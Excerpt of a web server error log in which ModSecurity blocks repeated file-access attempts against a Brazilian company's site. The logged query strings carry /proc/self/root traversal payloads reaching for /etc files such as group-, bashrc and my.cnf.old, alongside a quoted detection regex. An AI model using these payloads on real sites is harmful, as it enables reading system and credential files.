"abm_dNY0UrI5A3LftIwTjQAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:54:34.123258 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:54:35.820345 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:38032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm_i4h-PF_25v4hFRCA1wAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:54:57.129790 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56842] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:55:03.587982 2026] [:error] [pid 29151:tid 140411741927168] [client 216.73.216.191:65201] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm_p_PqhzTj3BvfDX-dnQAAAcA"]
[Tue Mar 17 17:55:20.128994 2026] [proxy_fcgi:error] [pid 29151:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57108] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:55:22.488114 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.244.43:40848] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm_ugeiSKl8TjouI-YtrQAAA9A"]
[Tue Mar 17 17:55:22.565219 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.228.61:34150] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm_ugeiSKl8TjouI-YtrgAAA9c"]
[Tue Mar 17 17:55:24.633155 2026] [:error] [pid 25836:tid 140411632822016] [client 216.73.216.191:12895] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm_vIh-PF_25v4hFRCA4wAAAQ0"]
[Tue Mar 17 17:55:44.117833 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57306] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:56:04.058614 2026] [:error] [pid 25836:tid 140411590858496] [client 216.73.216.191:27454] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm_5Ih-PF_25v4hFRCA6wAAARI"]
[Tue Mar 17 17:56:06.122160 2026] [proxy_fcgi:error] [pid 7437:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57536] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:56:28.123093 2026] [proxy_fcgi:error] [pid 6296:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:56:32.967922 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.243.128:40686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnAAPPqhzTj3BvfDX-dvwAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:56:46.963916 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:55628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnADuyqAr6etmhZHNo9bQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:56:50.134168 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58050] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:56:57.072749 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:58376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnAGeyqAr6etmhZHNo9hQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:57:12.129842 2026] [proxy_fcgi:error] [pid 19507:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58244] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:57:20.698118 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:59220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnAMBj0p0SRWAqcjGGQQAAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:57:33.095909 2026] [:error] [pid 2473:tid 140411565680384] [client 216.73.216.191:59730] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnAPaBJNF7axNlVR0UuvgAAABU"]
[Tue Mar 17 17:57:36.129985 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58490] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:57:59.097807 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58760] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:58:20.453958 2026] [:error] [pid 2473:tid 140411582465792] [client 216.73.216.191:62149] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnAbKBJNF7axNlVR0Uu0gAAABM"]
[Tue Mar 17 17:58:23.117976 2026] [proxy_fcgi:error] [pid 29151:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59184] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:58:41.675424 2026] [:error] [pid 7004:tid 140411641214720] [client 216.73.216.191:1434] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnAgcU6Sx0TG1YjmQjExwAAAow"]
[Tue Mar 17 17:58:45.146212 2026] [proxy_fcgi:error] [pid 25836:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59552] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:59:11.121772 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60014] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:59:34.126852 2026] [proxy_fcgi:error] [pid 25836:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60266] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:59:35.959750 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:38842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnAtxj0p0SRWAqcjGGQZwAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:59:37.127901 2026] [proxy_fcgi:error] [pid 6296:tid 140411574073088] [client 205.185.117.70:59502] AH01071: Got error 'Primary script unknown'
[Tue Mar 17 17:59:57.089573 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60530] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:59:57.707875 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.241.31:48336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnAzcU6Sx0TG1YjmQjE3gAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:00:00.778401 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:48338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnA0OyqAr6etmhZHNo99AAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:00:21.101811 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:00:22.445311 2026] [:error] [pid 6296:tid 140411582465792] [client 74.7.241.31:51522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnA5nIk7brgkOH-rIWi8QAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:00:22.652136 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.241.31:51522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnA5nIk7brgkOH-rIWi8gAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:00:22.652172 2026] [:error] [pid 6296:tid 140411624429312] [client 74.7.244.43:51660] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnA5nIk7brgkOH-rIWi8wAAAU4"]
[Tue Mar 17 18:00:23.301498 2026] [:error] [pid 7004:tid 140411565680384] [client 74.7.228.61:46164] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnA58U6Sx0TG1YjmQjE4gAAApU"]
[Tue Mar 17 18:00:24.863229 2026] [:error] [pid 7004:tid 140411699963648] [client 74.7.241.31:51526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnA6MU6Sx0TG1YjmQjE4wAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:00:26.477970 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.241.31:51534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnA6qBJNF7axNlVR0Uu8QAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:00:46.229606 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.31:51134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnA_geiSKl8TjouI-YuBAAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:00:47.151990 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:32784] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:01:08.133562 2026] [proxy_fcgi:error] [pid 2598:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33146] AH01075: Error dispatching request to : (polling)
